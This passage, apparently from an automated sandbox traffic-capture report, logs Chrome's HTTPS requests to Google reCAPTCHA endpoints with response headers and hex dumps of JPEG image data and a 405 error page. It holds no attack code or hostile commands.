                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC1378INData Raw: 5a 65 44 52 34 57 30 54 39 72 4f 75 31 2d 35 67 74 38 72 38 44 51 30 61 75 6b 44 32 58 6e 42 36 56 74 53 6b 32 5a 6c 62 4f 42 56 73 45 6f 54 6d 61 38 47 45 61 52 32 32 68 4d 51 41 62 6f 34 62 32 56 35 32 6e 6c 46 48 68 4d 79 55 4f 52 42 77 55 45 62 64 62 4b 59 47 49 64 58 6d 6a 36 41 63 5a 50 50 50 41 6e 7a 4a 57 74 66 4b 79 74 51 49 42 61 75 30 69 4e 54 33 56 63 52 31 4b 6a 75 35 4d 69 46 72 78 33 47 4a 44 46 58 67 31 63 65 75 36 50 74 74 30 6f 45 6c 6e 62 41 71 59 70 30 6b 52 49 31 52 6f 74 5f 37 4b 52 5a 6a 6a 6e 6b 4c 66 5f 44 33 5f 4d 68 7a 65 35 31 5a 63 48 62 32 6a 6e 76 63 48 6c 45 55 5a 51 68 55 74 6d 4e 33 61 79 56 52 78 4f 43 4e 57 64 54 73 6f 66 37 66 37 35 71 70 47 35 72 35 66 43 78 49 74 65 77 41 37 38 51 33 64 72 39 47 64 4f 67 62 63 44 37
                                                                                                                                                                                                                                                                  Data Ascii: ZeDR4W0T9rOu1-5gt8r8DQ0aukD2XnB6VtSk2ZlbOBVsEoTma8GEaR22hMQAbo4b2V52nlFHhMyUORBwUEbdbKYGIdXmj6AcZPPPAnzJWtfKytQIBau0iNT3VcR1Kju5MiFrx3GJDFXg1ceu6Ptt0oElnbAqYp0kRI1Rot_7KRZjjnkLf_D3_Mhze51ZcHb2jnvcHlEUZQhUtmN3ayVRxOCNWdTsof7f75qpG5r5fCxItewA78Q3dr9GdOgbcD7
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC1378INData Raw: 6e 4c 57 59 58 33 4b 6c 39 6e 52 51 6f 54 4d 6d 6e 6d 56 53 4e 4b 77 4c 72 46 50 4f 41 53 49 71 6e 4a 5a 34 62 6b 41 6f 76 52 62 6b 77 5a 4b 62 4c 45 67 4b 37 52 4a 54 64 4c 38 36 56 77 5a 53 70 49 65 61 50 4c 6d 34 63 6e 72 37 75 65 5a 43 58 63 70 53 4f 35 57 5a 64 7a 48 51 6f 6c 44 4e 74 44 72 59 62 76 31 6d 41 77 63 75 5a 74 76 4d 4e 6b 36 37 4a 4d 65 6b 61 74 53 44 50 55 6a 2d 35 63 49 68 54 45 55 4c 56 37 57 56 49 6e 66 31 55 62 77 50 6f 30 7a 37 5f 2d 64 70 79 66 32 34 36 7a 6a 78 4d 53 77 59 76 72 68 4a 4e 76 61 46 4a 64 71 75 4a 31 31 66 72 63 46 66 6e 78 66 33 50 48 6d 73 4d 75 34 46 44 32 61 6b 6f 4a 72 53 57 79 5a 6b 65 41 78 52 70 6d 79 6c 67 58 76 44 74 55 63 33 46 6e 76 73 46 77 31 6b 41 75 7a 68 4d 65 51 45 4b 75 59 75 4c 64 51 59 4a 31 78
                                                                                                                                                                                                                                                                  Data Ascii: nLWYX3Kl9nRQoTMmnmVSNKwLrFPOASIqnJZ4bkAovRbkwZKbLEgK7RJTdL86VwZSpIeaPLm4cnr7ueZCXcpSO5WZdzHQolDNtDrYbv1mAwcuZtvMNk67JMekatSDPUj-5cIhTEULV7WVInf1UbwPo0z7_-dpyf246zjxMSwYvrhJNvaFJdquJ11frcFfnxf3PHmsMu4FD2akoJrSWyZkeAxRpmylgXvDtUc3FnvsFw1kAuzhMeQEKuYuLdQYJ1x
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC1307INData Raw: 66 66 56 65 70 48 76 70 58 43 41 64 46 2d 6d 6a 44 47 4c 37 30 6d 45 6c 66 47 49 34 48 46 79 58 50 76 66 41 30 51 4d 72 71 61 36 6b 42 34 47 32 4d 6b 65 4d 68 62 68 44 6f 2d 6d 54 4a 65 45 77 51 6b 75 63 51 6e 64 36 4a 2d 47 33 47 6a 64 74 73 63 50 34 47 74 62 74 48 51 4b 4b 4e 76 59 58 55 44 45 59 67 77 62 77 44 52 67 4e 6c 77 59 5f 45 6b 7a 33 50 38 49 31 57 55 65 74 61 44 46 33 44 68 6e 41 57 35 67 4f 4d 30 5a 6e 78 75 77 77 57 36 46 78 4e 5a 45 71 51 65 6b 46 45 53 42 5a 64 69 7a 41 45 79 37 54 50 45 68 63 6f 4f 35 54 78 72 46 54 4c 45 33 76 4e 51 65 47 70 67 4f 69 62 45 4f 36 58 34 66 64 76 48 63 68 74 34 74 38 35 37 65 76 59 41 4f 75 32 44 33 62 7a 56 68 58 4e 34 49 6e 6f 54 53 69 6c 44 73 75 4b 6e 4d 58 65 32 6b 56 76 4a 61 4a 50 2d 56 45 36 44 61
                                                                                                                                                                                                                                                                  Data Ascii: ffVepHvpXCAdF-mjDGL70mElfGI4HFyXPvfA0QMrqa6kB4G2MkeMhbhDo-mTJeEwQkucQnd6J-G3GjdtscP4GtbtHQKKNvYXUDEYgwbwDRgNlwY_Ekz3P8I1WUetaDF3DhnAW5gOM0ZnxuwwW6FxNZEqQekFESBZdizAEy7TPEhcoO5TxrFTLE3vNQeGpgOibEO6X4fdvHcht4t857evYAOu2D3bzVhXN4InoTSilDsuKnMXe2kVvJaJP-VE6Da
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  109192.168.2.1649840142.250.184.2284437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA5i8qwOuZB2iEwQDIdMHHWCLx-DuxUkeqApRjcEcwOaom8dbnwlDBi1LlrOXwLH5TEg1nTW6DY2EP82MHHV_XtkT-xVrmmSi4TaBKCqrmS785OToDqZC8eHMnTJ0gBeLGZ-3VLhLefrMu_iOeAskLfzs-v_AMWbEnd86JjsFN5vRmcIAtKhS2jJI5Ksj3hLyAIddd9_O15f6l1Uupsya2vGXfDoAQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=3cc9e5c0b37478a1 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:09 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:09 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC697INData Raw: 31 30 35 64 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 105dJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC1378INData Raw: 80 dc 26 ec a9 2a c0 f1 83 c5 6b 4d e1 bd 6a 28 ad 9e e2 da 08 62 bb 38 8d 9e 40 78 db 90 4e dc 91 c5 32 5f 07 eb 12 2b bd 8b da dd 14 19 d9 13 36 49 fc 54 0a a8 e1 e4 f7 42 ba 43 34 fd 2f 5e d4 23 dd 6d a4 de dc c6 79 0c 90 b1 1f 9e 2a fa 78 33 c5 c5 c4 91 e8 37 9b 40 e8 40 53 fc ea 90 f0 37 8b e7 c1 8e 0b 8b 52 38 1b 5f 18 fc 8d 6b e9 9e 09 f1 dd b8 53 0e b7 a8 43 c7 20 5d 48 9f c8 56 d1 a1 1e a8 72 4b 4d 4b 56 9e 17 f1 14 91 79 77 7a 3d ec 40 1f ee 56 84 1a 0e a5 11 1e 6d bc a3 0a 47 cd b4 76 c5 3a c3 c3 7f 12 84 92 19 bc 57 78 b1 81 fb bc 4e 5c e7 df 72 d6 95 ae 93 f1 31 10 07 f1 70 04 0e f6 b1 c9 9f cf 15 aa 82 b5 ae 43 4b b9 84 fa 05 fa ab 37 d9 83 b0 3f 2a ac a0 7d 7b d1 fd 8d 71 8e 6d a4 53 df 20 1f d4 66 ba db 7b 5f 1e a7 13 eb ba 74 fe a6 4d 39
                                                                                                                                                                                                                                                                  Data Ascii: &*kMj(b8@xN2_+6ITBC4/^#my*x37@@S7R8_kSC ]HVrKMKVywz=@VmGv:WxN\r1pCK7?*}{qmS f{_tM9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC1378INData Raw: db 72 13 21 7f d1 7a 7b e6 b9 5d 1d ae 2c bc 34 97 56 f3 08 ee 37 b1 ca 6d 6c fc c1 7d c1 e9 52 26 b7 ad 5d 24 91 5d 5f 2c b1 48 a4 3c 64 6c 05 47 fb b8 a9 93 5b 0d 44 b7 75 e1 e5 87 c4 df d8 f6 b7 71 ea 87 00 f9 b6 a4 28 04 f6 25 88 0b f8 d6 bf 8e ec 53 40 be d3 34 8b a0 66 b5 9e dc 1f 2d 2e 04 80 8c e3 19 47 c7 5c e7 e9 4d d0 2d b5 d9 6d 85 c7 86 bc 27 6e e5 4e d9 a6 1b d6 32 7b 7c ce f8 07 d8 1e f5 0a 58 5f ea de 26 8a 5f 11 c6 b6 4f 04 0e ca f6 20 be 48 61 b4 64 31 00 f2 79 ab 85 3e 64 95 af 6d 45 39 f2 75 38 2b d8 f1 ab dd 47 12 b2 a2 48 42 8e e0 67 8e 4d 75 3e 0c d7 f5 c5 fb 2e 86 75 2b 85 d3 cb 36 6d 96 5c c6 7a 9e 9f 5a d4 d5 34 af 08 5b 5d 5f 3c d7 b7 92 cb 72 8a a9 6d 6e 7c d9 83 e4 e4 b3 9f 90 03 f2 9c 72 72 3a 57 3b e1 0b 25 b6 f1 54 d1 5d dc
                                                                                                                                                                                                                                                                  Data Ascii: r!z{],4V7ml}R&]$]_,H<dlG[Duq(%S@4f-.G\M-m'nN2{|X_&_O Had1y>dmE9u8+GHBgMu>.u+6m\zZ4[]_<rmn|rr:W;%T]
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC744INData Raw: ea ad 32 82 3f 33 45 7c 44 ba 6d c4 8a 24 92 68 a1 2c 33 b5 cf 38 f5 a2 b3 4d 77 2b d9 b3 d1 97 c1 e2 ca ed 67 bd bc 9c 46 a3 72 98 61 38 1f 52 72 2a 8d cd b5 bb ea 12 5c cb 33 e5 fe 45 63 86 18 1f 41 c5 7a 74 da ac f1 95 76 b5 b7 21 f9 07 ce ea 3f 2a 6b ea f7 61 03 c7 6b 64 41 e7 fe 3e 3a fe 00 57 9a ea bd 8e b7 4a fb 1e 68 ba 44 17 0e 1e 19 ae 94 1e 86 38 c9 cf d3 23 35 ad 79 e1 fd 4f 51 b8 8a 4f b3 32 88 e0 58 80 92 16 60 d8 ef 82 07 35 d8 c9 ad de 22 ee 36 b6 c1 4f 40 1c 9f e4 29 87 5b bd 20 34 70 c3 8f 56 0d c7 f2 a6 aa f4 05 4b b9 c1 5a f8 3b 52 89 ee 6d d8 4a c2 56 51 b9 61 61 b7 04 1c 8e 31 52 5d f8 0e eb 22 49 cd f5 d3 16 e3 ca 55 e3 dc e4 8f 4a ed 8e bd 7e 39 58 ad 24 e7 19 05 80 e7 d6 98 3c 4b 75 e6 3c 72 59 8c 2a ee 0e 88 cc a7 8e 99 c8 fe 54
                                                                                                                                                                                                                                                                  Data Ascii: 2?3E|Dm$h,38Mw+gFra8Rr*\3EcAztv!?*kakdA>:WJhD8#5yOQO2X`5"6O@)[ 4pVKZ;RmJVQaa1R]"IUJ~9X$<Ku<rY*T
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  110192.168.2.1649841142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:09 GMT
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:11:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  111192.168.2.1649843142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA5i8qwOuZB2iEwQDIdMHHWCLx-DuxUkeqApRjcEcwOaom8dbnwlDBi1LlrOXwLH5TEg1nTW6DY2EP82MHHV_XtkT-xVrmmSi4TaBKCqrmS785OToDqZC8eHMnTJ0gBeLGZ-3VLhLefrMu_iOeAskLfzs-v_AMWbEnd86JjsFN5vRmcIAtKhS2jJI5Ksj3hLyAIddd9_O15f6l1Uupsya2vGXfDoAQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=3cc9e5c0b37478a1 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:10 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:10 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC697INData Raw: 31 30 35 64 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 105dJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC1378INData Raw: 80 dc 26 ec a9 2a c0 f1 83 c5 6b 4d e1 bd 6a 28 ad 9e e2 da 08 62 bb 38 8d 9e 40 78 db 90 4e dc 91 c5 32 5f 07 eb 12 2b bd 8b da dd 14 19 d9 13 36 49 fc 54 0a a8 e1 e4 f7 42 ba 43 34 fd 2f 5e d4 23 dd 6d a4 de dc c6 79 0c 90 b1 1f 9e 2a fa 78 33 c5 c5 c4 91 e8 37 9b 40 e8 40 53 fc ea 90 f0 37 8b e7 c1 8e 0b 8b 52 38 1b 5f 18 fc 8d 6b e9 9e 09 f1 dd b8 53 0e b7 a8 43 c7 20 5d 48 9f c8 56 d1 a1 1e a8 72 4b 4d 4b 56 9e 17 f1 14 91 79 77 7a 3d ec 40 1f ee 56 84 1a 0e a5 11 1e 6d bc a3 0a 47 cd b4 76 c5 3a c3 c3 7f 12 84 92 19 bc 57 78 b1 81 fb bc 4e 5c e7 df 72 d6 95 ae 93 f1 31 10 07 f1 70 04 0e f6 b1 c9 9f cf 15 aa 82 b5 ae 43 4b b9 84 fa 05 fa ab 37 d9 83 b0 3f 2a ac a0 7d 7b d1 fd 8d 71 8e 6d a4 53 df 20 1f d4 66 ba db 7b 5f 1e a7 13 eb ba 74 fe a6 4d 39
                                                                                                                                                                                                                                                                  Data Ascii: &*kMj(b8@xN2_+6ITBC4/^#my*x37@@S7R8_kSC ]HVrKMKVywz=@VmGv:WxN\r1pCK7?*}{qmS f{_tM9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:10 UTC1378INData Raw: db 72 13 21 7f d1 7a 7b e6 b9 5d 1d ae 2c bc 34 97 56 f3 08 ee 37 b1 ca 6d 6c fc c1 7d c1 e9 52 26 b7 ad 5d 24 91 5d 5f 2c b1 48 a4 3c 64 6c 05 47 fb b8 a9 93 5b 0d 44 b7 75 e1 e5 87 c4 df d8 f6 b7 71 ea 87 00 f9 b6 a4 28 04 f6 25 88 0b f8 d6 bf 8e ec 53 40 be d3 34 8b a0 66 b5 9e dc 1f 2d 2e 04 80 8c e3 19 47 c7 5c e7 e9 4d d0 2d b5 d9 6d 85 c7 86 bc 27 6e e5 4e d9 a6 1b d6 32 7b 7c ce f8 07 d8 1e f5 0a 58 5f ea de 26 8a 5f 11 c6 b6 4f 04 0e ca f6 20 be 48 61 b4 64 31 00 f2 79 ab 85 3e 64 95 af 6d 45 39 f2 75 38 2b d8 f1 ab dd 47 12 b2 a2 48 42 8e e0 67 8e 4d 75 3e 0c d7 f5 c5 fb 2e 86 75 2b 85 d3 cb 36 6d 96 5c c6 7a 9e 9f 5a d4 d5 34 af 08 5b 5d 5f 3c d7 b7 92 cb 72 8a a9 6d 6e 7c d9 83 e4 e4 b3 9f 90 03 f2 9c 72 72 3a 57 3b e1 0b 25 b6 f1 54 d1 5d dc
                                                                                                                                                                                                                                                                  Data Ascii: r!z{],4V7ml}R&]$]_,H<dlG[Duq(%S@4f-.G\M-m'nN2{|X_&_O Had1y>dmE9u8+GHBgMu>.u+6m\zZ4[]_<rmn|rr:W;%T]
